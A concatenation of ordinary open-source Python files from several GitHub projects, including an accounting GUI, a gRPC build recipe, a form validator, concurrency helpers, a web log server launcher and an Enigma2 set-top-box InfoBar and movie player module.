def refinar_busqueda_abonos(self, abonos):
"""
Recibe un SelectResults de abonos y muestra una ventana
con la información de todos ellos.
Devuelve la factura del abono seleccionado o None si cancela.
"""
abono = None
filas = [(a.id,
utils.str_fecha(a.fecha),
a.clienteID and a.cliente.nombre or "",
a.importeSinIva, a.facturaDeAbonoID and a.numabono or "")
for a in abonos]
idabono = utils.dialogo_resultado(filas,
titulo = "SELECCIONE ABONO",
cabeceras = ('ID',
'Fecha',
'Cliente',
'Importe sin IVA',
'Factura de abono'),
padre = self.wids['ventana'])
if idabono != None and idabono != -1:
abono = pclases.Abono.get(idabono)
return abono
def drop_cobro(self, b):
confirming = self.objeto
txt = """
¿Está seguro de desligar la factura seleccionada del confirming?
"""
if not utils.dialogo(titulo = '¿BORRAR?',
texto = txt):
return
model, path = self.wids['tv_cobros'].get_selection().get_selected()
if not path:
utils.dialogo_info(titulo = "SELECCIONE UN COBRO",
texto = "Debe seleccionar la fila a eliminar.",
padre = self.wids['ventana'])
else:
idc = model[path][-1]
cobro = pclases.Cobro.get(idc)
antes = sum([c.importe for c in confirming.cobros])
if antes == confirming.cantidad:
actualizar_cantidad = True # Como el importe es la suma de los
# cobros, el nuevo que añado ahora tiene que actualizar
# la cantidad. Si no fuera así (el importe es distinto a
# la suma de los cobros) es que se ha introducido a mano
# y por tanto debo respetarlo.
else:
actualizar_cantidad = False
cobro.destroy(usuario = self.usuario, ventana = __file__)
if actualizar_cantidad:
confirming.cantidad = sum(
[c.importe for c in confirming.cobros])
if confirming.cobrado > confirming.cantidad:
confirming.cobrado = confirming.cantidad
self.actualizar_ventana()
def cambiar_fechac(self, b):
self.wids['e_fechac'].set_text(utils.str_fecha(
utils.mostrar_calendario(padre = self.wids['ventana'])))
def cambiar_fechar(self, b):
self.wids['e_fechar'].set_text(utils.str_fecha(
utils.mostrar_calendario(padre = self.wids['ventana'])))
def borrar(self, widget):
"""
Elimina el confirming en pantalla.
"""
confirming = self.objeto
if confirming != None:
if utils.dialogo('¿Está seguro de eliminar el confirming actual?',
'BORRAR CONFIRMING',
padre = self.wids['ventana']):
confirming.notificador.set_func(lambda : None)
try:
for c in confirming.cobros:
c.destroy(usuario = self.usuario, ventana = __file__)
for e in confirming.efectos:
e.destroy(usuario = self.usuario, ventana = __file__)
confirming.destroy(usuario = self.usuario,
ventana = __file__)
self.ir_a_primero()
except:
txt = """
El confirming no se eliminó completamente.
Tal vez el confirming o los vencimientos de facturas
relacionados estén siendo referenciados por otros
elementos de la aplicación. Contacte con el administrador.
Información de depuración:
"""
for c in confirming.cobros:
txt += "ID cobro: %d.\n" % c.id
txt += "ID confirming: %d\n" % confirming.id
utils.dialogo_info(titulo = 'ERROR: NO SE PUDO BORRAR',
texto = txt)
if __name__ == '__main__':
v = Confirmings()
| pacoqueen/ginn | ginn/formularios/confirmings.py | Python | gpl-2.0 | 54,543 |
# Copyright (C) 2016 - Yevgen Muntyan
# Copyright (C) 2016 - Ignacio Casal Quinteiro
# Copyright (C) 2016 - Arnavion
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
from gvsbuild.utils.base_builders import CmakeProject
from gvsbuild.utils.base_expanders import GitRepo
from gvsbuild.utils.base_project import Project, project_add
@project_add
class Grpc(GitRepo, CmakeProject):
def __init__(self):
Project.__init__(
self,
"grpc",
repo_url="https://github.com/grpc/grpc.git",
fetch_submodules=True,
tag="v1.12.0",
dependencies=["go", "nuget", "protobuf", "perl", "zlib", "nasm"],
patches=["0001-removing-extra-plugins.patch"],
)
def build(self):
CmakeProject.build(
self,
cmake_params="-DgRPC_ZLIB_PROVIDER=package -DgRPC_PROTOBUF_PROVIDER=package",
use_ninja=True,
out_of_source=False,
)
self.install(r".\third_party\boringssl\ssl\ssl.lib lib")
self.install(r".\third_party\boringssl\crypto\crypto.lib lib")
self.install(r".\gpr.lib lib")
self.install(r".\grpc.lib lib")
self.install(r".\grpc++.lib lib")
self.install(r".\grpc_cpp_plugin.exe bin")
self.install(r".\grpc_cpp_plugin.pdb bin")
self.install(r".\grpc_csharp_plugin.exe bin")
self.install(r".\grpc_csharp_plugin.pdb bin")
self.install(r".\LICENSE share\doc\grpc")
| wingtk/gvsbuild | gvsbuild/projects/grpc.py | Python | gpl-2.0 | 2,081 |
from .validator import Validator
from ..util import register_as_validator
class ExactLength(Validator):
__validator_name__ = 'exact_length'
def __init__(self, exact_length):
super(ExactLength, self).__init__()
self.exact_length = exact_length
def validate(self, data, request=None, session=None):
return len(data) >= self.exact_length
register_as_validator(ExactLength) | Performante/pyFormante | pyFormante/validation/exact_length.py | Python | gpl-2.0 | 411 |
import jmri.jmrit.jython.Jynstrument as Jynstrument
import jmri.jmrit.catalog.NamedIcon as NamedIcon
import jmri.jmrit.symbolicprog.tabbedframe.PaneOpsProgAction as PaneOpsProgAction
import javax.swing.JButton as JButton
class DecoderPro(Jynstrument):
def getExpectedContextClassName(self):
return "javax.swing.JComponent"
def init(self):
jbNew = JButton( PaneOpsProgAction() )
jbNew.setIcon( NamedIcon("resources/decoderpro.gif","resources/decoderpro.gif") )
jbNew.addMouseListener(self.getMouseListeners()[0]) # In order to get the popupmenu on the button too
jbNew.setToolTipText( jbNew.getText() )
jbNew.setText( None )
self.add(jbNew)
def quit(self):
pass | ctag/cpe453 | JMRI/jython/Jynstruments/Launchers/DecoderPro.jyn/DecoderPro.py | Python | gpl-2.0 | 744 |
#!/usr/bin/python
# coding:utf-8
# Author: ASU --<andrei.suiu@gmail.com>
# Purpose: Concurrent utility classes (name coming from RACEconditionLIBrary)
# Created: 11/26/2015
import time
__author__ = 'ASU'
class ContextLock():
def __init__(self, lock):
"""
:param lock:
:type lock: thread.LockType
"""
self.__lock = lock
def __enter__(self):
self.__lock.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.__lock.release()
return False
class TimePerformanceLogger:
"""
Used to measure the performance of a code block run within a With Statement Context Manager
"""
def __init__(self, logger):
"""
:param logger: logger function tha would get argument number of seconds
:type logger: (basestring) -> None
"""
self._logger = logger
def __enter__(self):
self._t1 = time.time()
def __exit__(self, exc_type, exc_value, traceback):
self._logger(time.time() - self._t1)
if exc_type:
return False
return True
| asuiu/pyxtension | py2/pyxtension/racelib.py | Python | gpl-2.0 | 1,107 |
'''
Copyright (C) 2016 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
'''
from __future__ import absolute_import, division, print_function, unicode_literals
import logging # pylint: disable=W0611
import sys
import subprocess
import signal
import os
from common import common_logging
from common import common_signal
# set signal exit breaks
common_signal.com_signal_set_break()
# start logging
common_logging.com_logging_start()
logging.info('Check Certs')
# check for and create ssl certs if needed
if not os.path.isfile('./key/cacert.pem'):
proc_ssl = subprocess.Popen(['subprogram_ssl_keygen'], shell=False)
proc_ssl.wait()
if not os.path.isfile('./key/cacert.pem'):
logging.critical("Cannot generate SSL certificate. Exiting.....")
sys.exit()
# startup the other reactor via popen as it's non-blocking
proc = subprocess.Popen(['subprogram_reactor_string_weblog'], shell=False)
logging.info("Reactor PID: %s", proc.pid)
# fire up uwsgi server
proc_web_app = subprocess.Popen(['uwsgi', '--socket', '0.0.0.0:8081', '--protocol', 'http',
'--chdir=./server/web_log', '--ini', './server/web_log/weblog_uwsgi.ini'],
shell=False)
# hold here
proc_web_app.wait()
# stop children
os.kill(proc.pid, signal.SIGTERM)
os.kill(proc_web_app.pid, signal.SIGTERM)
| MediaKraken/mkarchive | main_server_weblog.py | Python | gpl-2.0 | 1,963 |
from Tools.Profile import profile
from Tools.BoundFunction import boundFunction
# workaround for required config entry dependencies.
import Screens.MovieSelection
from Components.PluginComponent import plugins
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.Label import Label
from Components.Pixmap import MultiPixmap
from Tools.Directories import fileExists
profile("LOAD:enigma")
import enigma
import os
from boxbranding import getBoxType, getMachineBrand, getBrandOEM, getMachineBuild, getMachineName
boxtype = getBoxType()
profile("LOAD:InfoBarGenerics")
from Screens.InfoBarGenerics import InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarRdsDecoder, InfoBarRedButton, InfoBarTimerButton, InfoBarVmodeButton, \
InfoBarEPG, InfoBarSeek, InfoBarInstantRecord, InfoBarResolutionSelection, InfoBarAspectSelection, \
InfoBarAudioSelection, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, \
InfoBarSubserviceSelection, InfoBarShowMovies, \
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarSimpleEventView, InfoBarBuffer, \
InfoBarSummarySupport, InfoBarMoviePlayerSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, \
InfoBarSubtitleSupport, InfoBarPiP, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, setResumePoint, delResumePoint
from Screens.ButtonSetup import InfoBarButtonSetup
profile("LOAD:InitBar_Components")
from Components.ActionMap import HelpableActionMap
from Components.Timeshift import InfoBarTimeshift
from Components.config import config
from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase
profile("LOAD:HelpableScreen")
from Screens.HelpMenu import HelpableScreen
class InfoBar(InfoBarBase, InfoBarShowHide,
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder,
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarResolutionSelection, InfoBarAspectSelection, InfoBarVmodeButton,
HelpableScreen, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection,
InfoBarSubserviceSelection, InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarBuffer,
InfoBarSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions,
InfoBarPiP, InfoBarPlugins, InfoBarSubtitleSupport, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper,
InfoBarHdmi, Screen, InfoBarButtonSetup):
ALLOW_SUSPEND = True
instance = None
def __init__(self, session):
Screen.__init__(self, session)
if config.usage.show_infobar_lite.value and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('oDreamy-FHD/skin.xml/')):
self.skinName = "OPD-Blue-Line/skin.xml"
self["actions"] = HelpableActionMap(self, "InfobarActions",
{
"showMovies": (self.showMovies, _("Play recorded movies...")),
"showRadio": (self.showRadioButton, _("Show the radio player...")),
"showTv": (self.showTvButton, _("Show the tv player...")),
"toogleTvRadio": (self.toogleTvRadio, _("Toggels between tv and radio...")),
"openBouquetList": (self.openBouquetList, _("Open bouquetlist...")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
"openBouquetList": (self.openBouquetList, _("open bouquetlist")),
"openWeather": (self.openWeather, _("Open Weather...")),
"openTimerList": (self.openTimerList, _("Open Timerlist...")),
"openAutoTimerList": (self.openAutoTimerList, _("Open AutoTimerlist...")),
"openEPGSearch": (self.openEPGSearch, _("Open EPGSearch...")),
"openIMDB": (self.openIMDB, _("Open IMDB...")),
"showMC": (self.showMediaCenter, _("Show the media center...")),
"openSleepTimer": (self.openPowerTimerList, _("Show the Sleep Timer...")),
'ZoomInOut': (self.ZoomInOut, _('Zoom In/Out TV...')),
'ZoomOff': (self.ZoomOff, _('Zoom Off...')),
'HarddiskSetup': (self.HarddiskSetup, _('Select HDD')),
"showWWW": (self.showPORTAL, _("Open MediaPortal...")),
"showSetup": (self.showSetup, _("Show setup...")),
"showFormat": (self.showFormat, _("Show Format Setup...")),
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugins...")),
"showBoxPortal": (self.showBoxPortal, _("Show Box Portal...")),
}, prio=2)
self["key_red"] = Label()
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["key_green"] = Label()
self.allowPiP = True
self.radioTV = 0
for x in HelpableScreen, \
InfoBarBase, InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, \
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarResolutionSelection, InfoBarVmodeButton, \
InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarSubserviceSelection, InfoBarAspectSelection, InfoBarBuffer, \
InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarSummarySupport, InfoBarTimeshiftState, \
InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarSubtitleSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarButtonSetup:
x.__init__(self)
self.helpList.append((self["actions"], "InfobarActions", [("showMovies", _("Watch recordings..."))]))
self.helpList.append((self["actions"], "InfobarActions", [("showRadio", _("Listen to the radio..."))]))
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
enigma.iPlayableService.evUpdatedEventInfo: self.__eventInfoChanged
})
self.current_begin_time=0
assert InfoBar.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
InfoBar.instance = self
if config.misc.initialchannelselection.value:
self.onShown.append(self.showMenu)
self.zoomrate = 0
self.zoomin = 1
self.onShow.append(self.doButtonsCheck)
def showMenu(self):
self.onShown.remove(self.showMenu)
config.misc.initialchannelselection.value = False
config.misc.initialchannelselection.save()
self.mainMenu()
def doButtonsCheck(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
if config.usage.defaultEPGType.value == "Graphical EPG..." or config.usage.defaultEPGType.value == "None":
self["key_red"].setText(_("Single EPG"))
else:
self["key_red"].setText(_("ViX EPG"))
if not config.plisettings.Subservice.value:
self["key_green"].setText(_("Timers"))
else:
self["key_green"].setText(_("Green Panel"))
self["key_blue"].setText(_("Blue Panel"))
def __onClose(self):
InfoBar.instance = None
def __eventInfoChanged(self):
if self.execing:
service = self.session.nav.getCurrentService()
old_begin_time = self.current_begin_time
info = service and service.info()
ptr = info and info.getEvent(0)
self.current_begin_time = ptr and ptr.getBeginTime() or 0
if config.usage.show_infobar_on_event_change.value:
if old_begin_time and old_begin_time != self.current_begin_time:
self.doShow()
def __checkServiceStarted(self):
self.__serviceStarted(True)
self.onExecBegin.remove(self.__checkServiceStarted)
def serviceStarted(self): #override from InfoBarShowHide
new = self.servicelist.newServicePlayed()
if self.execing:
InfoBarShowHide.serviceStarted(self)
self.current_begin_time=0
elif not self.__checkServiceStarted in self.onShown and new:
self.onShown.append(self.__checkServiceStarted)
def __checkServiceStarted(self):
self.serviceStarted()
self.onShown.remove(self.__checkServiceStarted)
def openBouquetList(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "ChannelList":
self.showTvChannelList(True)
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
self.servicelist.showFavourites()
def showTvButton(self):
if boxtype.startswith('gb') or boxtype in ('classm', 'genius', 'evo', 'galaxym6'):
self.toogleTvRadio()
elif boxtype in ('uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin'):
self.showMovies()
else:
self.showTv()
def showTv(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showTvChannelList(True)
def showRadioButton(self):
if boxtype.startswith('gb') or boxtype.startswith('azbox') or boxtype in ('classm', 'genius', 'evo', 'galaxym6', 'uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin', 'beyonwizt3'):
self.toogleTvRadio()
else:
self.showRadio()
def showRadio(self):
if config.usage.e1like_radio_mode.value:
if config.usage.tvradiobutton_mode.value == "BouquetList":
self.showRadioChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showRadioChannelList(True)
else:
self.rds_display.hide() # in InfoBarRdsDecoder
from Screens.ChannelSelection import ChannelSelectionRadio
self.session.openWithCallback(self.ChannelSelectionRadioClosed, ChannelSelectionRadio, self)
def toogleTvRadio(self):
if self.radioTV == 1:
self.radioTV = 0
self.showTv()
else:
self.radioTV = 1
self.showRadio()
def ChannelSelectionRadioClosed(self, *arg):
self.rds_display.show() # in InfoBarRdsDecoder
self.radioTV = 0
self.doShow()
def showMovies(self, defaultRef=None):
if getMachineBrand() == 'GI' or boxtype.startswith('azbox') or boxtype.startswith('ini') or boxtype.startswith('venton'):
from Screens.BoxPortal import BoxPortal
self.session.open(BoxPortal)
else:
self.showMoviePlayer(defaultRef)
def showMoviePlayer(self, defaultRef=None): #for using with hotkeys (ButtonSetup.py) regardless of plugins which overwrite the showMovies function
self.lastservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if self.lastservice and ':0:/' in self.lastservice.toString():
self.lastservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, defaultRef, timeshiftEnabled = self.timeshiftEnabled())
def movieSelected(self, service):
ref = self.lastservice
del self.lastservice
if service is None:
if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.session.nav.playService(ref)
else:
self.session.open(MoviePlayer, service, slist = self.servicelist, lastservice = ref)
def showMediaPlayer(self):
try:
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPlayer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showMediaCenter(self):
try:
from Plugins.Extensions.BMediaCenter.plugin import DMC_MainMenu
self.session.open(DMC_MainMenu)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaCenter plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openSleepTimer(self):
from Screens.SleepTimerEdit import SleepTimerEdit
self.session.open(SleepTimerEdit)
def openTimerList(self):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
def openPowerTimerList(self):
from Screens.PowerTimerEdit import PowerTimerEditList
self.session.open(PowerTimerEditList)
def openAutoTimerList(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("AutoTimer"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The AutoTimer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openWeather(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Weather Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The Weather plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openEPGSearch(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("EPGSearch") or plugin.name == _("search EPG...") or plugin.name == "Durchsuche EPG...":
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The EPGSearch plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openIMDB(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("IMDb Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The IMDb plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def ZoomInOut(self):
zoomval = 0
if self.zoomrate > 3:
self.zoomin = 0
elif self.zoomrate < -9:
self.zoomin = 1
if self.zoomin == 1:
self.zoomrate += 1
else:
self.zoomrate -= 1
if self.zoomrate < 0:
zoomval = abs(self.zoomrate) + 10
else:
zoomval = self.zoomrate
print 'zoomRate:', self.zoomrate
print 'zoomval:', zoomval
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write('%d' % int(zoomval))
file.close()
def ZoomOff(self):
self.zoomrate = 0
self.zoomin = 1
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write(str(0))
file.close()
def HarddiskSetup(self):
from Screens.HarddiskSetup import HarddiskSelection
self.session.open(HarddiskSelection)
def showPORTAL(self):
try:
from Plugins.Extensions.MediaPortal.plugin import MPmain as MediaPortal
MediaPortal(self.session)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPortal plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showSetup(self):
from Screens.Menu import MainMenu, mdom
root = mdom.getroot()
for x in root.findall("menu"):
y = x.find("id")
if y is not None:
id = y.get("val")
if id and id == "setup":
self.session.infobar = self
self.session.open(MainMenu, x)
return
def showFormat(self):
try:
from Plugins.SystemPlugins.Videomode.plugin import videoSetupMain
self.session.instantiateDialog(videoSetupMain)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The VideoMode plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showPluginBrowser(self):
from OPENDROID.GreenPanel import GreenPanel
self.session.open(GreenPanel)
def showBoxPortal(self):
if getMachineBrand() == 'GI' or boxtype.startswith('azbox') or boxtype.startswith('ini') or boxtype.startswith('venton'):
from Screens.BoxPortal import BoxPortal
self.session.open(BoxPortal)
else:
self.showMovies()
def setAudioTrack(service):
try:
from Tools.ISO639 import LanguageCodes as langC
tracks = service and service.audioTracks()
nTracks = tracks and tracks.getNumberOfTracks() or 0
if not nTracks: return
idx = 0
trackList = []
for i in xrange(nTracks):
audioInfo = tracks.getTrackInfo(i)
lang = audioInfo.getLanguage()
if langC.has_key(lang):
lang = langC[lang][0]
desc = audioInfo.getDescription()
track = idx, lang, desc
idx += 1
trackList += [track]
seltrack = tracks.getCurrentTrack()
# we need default selected language from image
# to set the audiotrack if "config.autolanguage.audio_autoselect...values" are not set
from Components.Language import language
syslang = language.getLanguage()[:2]
syslang = langC[syslang][0]
if (config.autolanguage.audio_autoselect1.value or config.autolanguage.audio_autoselect2.value or config.autolanguage.audio_autoselect3.value or config.autolanguage.audio_autoselect4.value) != "---":
audiolang = [config.autolanguage.audio_autoselect1.value, config.autolanguage.audio_autoselect2.value, config.autolanguage.audio_autoselect3.value, config.autolanguage.audio_autoselect4.value]
caudiolang = True
else:
audiolang = syslang
caudiolang = False
useAc3 = config.autolanguage.audio_defaultac3.value
if useAc3:
matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
if matchedAc3: return
matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
if matchedMpeg: return
tracks.selectTrack(0) # fallback to track 1(0)
return
else:
matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
if matchedMpeg: return
matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
if matchedAc3: return
tracks.selectTrack(0) # fallback to track 1(0)
except Exception, e:
print("[MoviePlayer] audioTrack exception:\n" + str(e))
def tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3):
for entry in audiolang:
if caudiolang:
# we need here more replacing for other language, or new configs with another list !!!
# choice gives only the value, never the description
# so we can also make some changes in "config.py" to get the description too, then we dont need replacing here !
entry = entry.replace('eng qaa Englisch', 'English').replace('deu ger', 'German')
for x in trackList:
if entry == x[1] and seltrack == x[0]:
if useAc3:
if x[2].startswith('AC'):
print("[MoviePlayer] audio track is current selected track: " + str(x))
return True
else:
print("[MoviePlayer] audio track is current selected track: " + str(x))
return True
elif entry == x[1] and seltrack != x[0]:
if useAc3:
if x[2].startswith('AC'):
print("[MoviePlayer] audio track match: " + str(x))
tracks.selectTrack(x[0])
return True
else:
print("[MoviePlayer] audio track match: " + str(x))
tracks.selectTrack(x[0])
return True
return False
class MoviePlayer(InfoBarAspectSelection, InfoBarSimpleEventView, InfoBarBase, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, InfoBarAudioSelection, HelpableScreen, InfoBarNotifications,
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport,
InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, Screen, InfoBarTeletextPlugin,
InfoBarServiceErrorPopupSupport, InfoBarExtensions, InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarHdmi, InfoBarButtonSetup):
ENABLE_RESUME_SUPPORT = True
ALLOW_SUSPEND = True
instance = None
def __init__(self, session, service, slist = None, lastservice = None):
Screen.__init__(self, session)
InfoBarAspectSelection.__init__(self)
InfoBarAudioSelection.__init__(self)
InfoBarSimpleEventView.__init__(self)
self.pts_pvrStateDialog = ""
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["key_green"] = Label()
self["eventname"] = Label()
self["state"] = Label()
self["speed"] = Label()
self["statusicon"] = MultiPixmap()
self["actions"] = HelpableActionMap(self, "MoviePlayerActions",
{
"leavePlayer": (self.leavePlayer, _("leave movie player...")),
"leavePlayerOnExit": (self.leavePlayerOnExit, _("leave movie player..."))
})
self.allowPiP = True
for x in HelpableScreen, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
InfoBarBase, InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, \
InfoBarAudioSelection, InfoBarNotifications, InfoBarSimpleEventView, \
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, \
InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, \
InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, \
InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarButtonSetup:
x.__init__(self)
self.onChangedEntry = [ ]
self.servicelist = slist
self.lastservice = lastservice or session.nav.getCurrentlyPlayingServiceOrGroup()
session.nav.playService(service)
self.cur_service = service
self.returning = False
self.onClose.append(self.__onClose)
self.onShow.append(self.doButtonsCheck)
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
enigma.iPlayableService.evStart: self.__evStart
})
assert MoviePlayer.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
MoviePlayer.instance = self
# is needed for every first call of MoviePlayer
self.__evStart()
def __evStart(self):
self.switchAudioTimer = enigma.eTimer()
self.switchAudioTimer.callback.append(self.switchAudio)
self.switchAudioTimer.start(750, True) # 750 is a safe-value
def switchAudio(self):
service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if service:
# we go this way for other extensions as own records(they switch over pmt)
path = service.getPath()
import os
ext = os.path.splitext(path)[1].lower()
exts = [".mkv", ".avi", ".divx", ".mp4"] # we need more extensions here ?
if ext.lower() in exts:
service = self.session.nav.getCurrentService()
if service:
setAudioTrack(service)
def doButtonsCheck(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
self["key_green"].setText(_("Green Panel"))
self["key_blue"].setText(_("Blue Panel"))
def __onClose(self):
MoviePlayer.instance = None
from Screens.MovieSelection import playlist
del playlist[:]
Screens.InfoBar.InfoBar.instance.callServiceStarted()
self.session.nav.playService(self.lastservice)
config.usage.last_movie_played.value = self.cur_service.toString()
config.usage.last_movie_played.save()
def handleLeave(self, how):
self.is_closing = True
if how == "ask":
if config.usage.setup_level.index < 2: # -expert
list = (
(_("Yes"), "quit"),
(_("No"), "continue")
)
else:
list = (
(_("Yes"), "quit"),
(_("Yes, returning to movie list"), "movielist"),
(_("Yes, and delete this movie"), "quitanddelete"),
(_("Yes, delete this movie and return to movie list"), "deleteandmovielist"),
(_("No"), "continue"),
(_("No, but restart from begin"), "restart")
)
from Screens.ChoiceBox import ChoiceBox
self.session.openWithCallback(self.leavePlayerConfirmed, ChoiceBox, title=_("Stop playing this movie?"), list = list)
else:
self.leavePlayerConfirmed([True, how])
def leavePlayer(self):
setResumePoint(self.session)
